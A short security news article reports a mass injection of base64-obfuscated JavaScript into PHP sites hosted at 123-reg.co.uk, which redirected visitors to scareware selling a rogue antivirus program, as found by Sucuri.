14 DAY TRIAL // A new mass injection attack infected a significant number of websites hosted at 123-reg.co.uk, one of the largest domain providers in UK, with code directing visitors to scareware.
The attack was discovered by Sucuri Security, a company providing Web integrity monitoring solutions and operating a website malware scanner.
Affected websites get obfuscated JavaScript code encoded in base 64, added to all of their PHP files.
The code is actually a script element which loads malicious content from external domains including meqashopperinfo.com, meqashoppercom.com, meqashopperonline.com and www4.in-scale-feed.in.
The attack redirects visitors of the infected websites to a scareware page, which mimics an antivirus scan and displays bogus alerts about malware infections on their computers.
The purpose of the scam is to trick users into downloading and installing a rogue AV program, which further bombards their desktop with fake security warnings in an attempt to convince them to buy a license.
People who end up doing so will not only pay a steep price for a useless application, but they will also compromise their credit card details in the process.
"What’s interesting is that the domain is registered by the same people responsible for the previous attacks at Godaddy, Bluehost, etc: Hillary Kneber," writes David Dede, a researcher at Sucuri.
Hillary Kneber is a well known fake identity used by cybercriminals to register domain names that are later used in malicious activities.
Other big hosting providers like Go Daddy, Network Solutions, Bluehost or RackSpace, have been attacked in the past in similar ways, some of them even repeatedly.
This has forced them to take various precautions, educate their users and create automated cleaning systems.
It's worth noting that attacks targeting a particular hosting company doesn't necessarily point to a vulnerability in it's infrastructure.
This usually happens because attackers use automated tools to scan entire blocks of IP addresses for vulnerable sites and then inject them all at once.
If your website is affected, you should check out Sucuri's free clean-up script. Even though it has WordPress in the name, it should work for any PHP-based site.